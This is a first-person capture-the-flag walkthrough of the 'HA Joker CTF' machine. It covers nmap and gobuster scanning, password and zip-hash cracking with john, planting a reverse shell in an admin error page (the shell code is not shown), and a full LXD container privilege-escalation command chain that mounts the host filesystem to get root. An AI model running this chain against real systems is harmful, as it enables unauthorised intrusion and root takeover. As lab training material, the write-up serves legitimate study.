Hello everyone.Today i will explain hack the “HA Joker CTF” machine.Let’s start hack this machine.
nmap -sN -sV <machine_ip>
We can enumerate the machine with nmap(Nmap shows open ports and services).
I want to scan hidden directories/files in the web server (80 port)
gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip
You can find answers of question 4 and question 5.
We can see open ports,services and versions.Let’s try connect to web server on port 8080.
We must enter username and password.I will try crack the password(I think username is joker).
HA-HA-HA! I found password.I think we should find hidden directories/files.
i will use nikto.
nikto -h http://<machine_ip>:8080/ -id joker:<password_here>
I found backup.zip.I think it is contain username and password and we need a password for unzip files.Let’s crack zip password.
zip2john backup.zip > backuphash
I saved backup.zip’s hash to backuphash.Now we should crack hash.
john — wordlist=<wordlist_path> backuphash
I cracked password and unzip file.I can see a folder(folder name=db).
I found a file in this folder.I read the file and i saw Super Duper User’s password and username.
I must crack this hash.
nano dbhash
john — wordlist=<wordlist_path> dbhash
In my opinion i should login a admin account with this password and username.
I looked robots.txt and i saw /administrator/ directory.
I login as admin.
I will add reverse-shell in error page.
HA-HA-HA! but i need more powerful shell.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
ctrl^z
stty raw -echo && fg
stty rows 78 columns 131(These are my own “rows” and “column” value . Write “stty -a” see your values)
If you will write “id” you can see (lxd).Let’s search on google lxd privesc
I found a website.
I Downloaded lxd-alpine-builder.
https://github.com/saghul/lxd-alpine-builder
git clone https://github.com/saghul/lxd-alpine-builder.git
./alpine-builder
I am creating a web server with python because i should download “alpine-v3.14-x86_64–20210803_1040.tar.gz” file into target machine.
python -m SimpleHTTPServer
And i get file with wget(go /tmp folder).
lxc image import ./alpine-v3.10-x86_64–20191008_1227.tar.gz — alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
I am ROOT!!!!!
I found final file.Thanks for read my writeup.
